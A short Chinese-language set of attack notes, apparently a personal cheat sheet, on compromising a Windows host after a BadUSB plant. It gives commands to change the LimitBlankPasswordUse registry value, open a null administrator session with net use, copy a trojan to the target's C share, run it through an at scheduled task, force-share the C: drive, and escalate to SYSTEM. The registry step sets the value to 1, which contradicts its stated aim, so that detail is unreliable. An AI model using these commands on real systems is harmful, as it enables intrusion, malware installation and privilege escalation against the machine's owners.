- 1 设想利用 badusb 修改组策略里的 “限制空密码登录控制台” 的选项.
cmd /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa /v LimitBlankPasswordUse /t REG_DWORD /d 1 /f"
通过修改这个选项,下一步可以利用 net use 建立空链接.
- 2 net use
net use \\IP "" /user:administrator
#建立空链接
net view #然后查看目标机器的共享了哪些目录?
#假设有可用的共享目录c
copy 木马.exe \\ip\c #拷贝木马文件到目标机器
#使用 at 计划任务命令
net time \\ip #查看目标机器现在的时间
at \\ip 17:55:00 cmd /c "c:\木马.exe" #通过计划任务命令运行拷贝的木马文件
#如果没有可用的共享目录
at \\ip 17:55:00 cmd /c "net share c=c: /grant:administrator,full" #使用计划任务共享一下c盘以便来使用.
ps:
at #使用了 system 权限, meterpreter [get system] 不好用的时候,也可以用来运行木马文件来进行提权.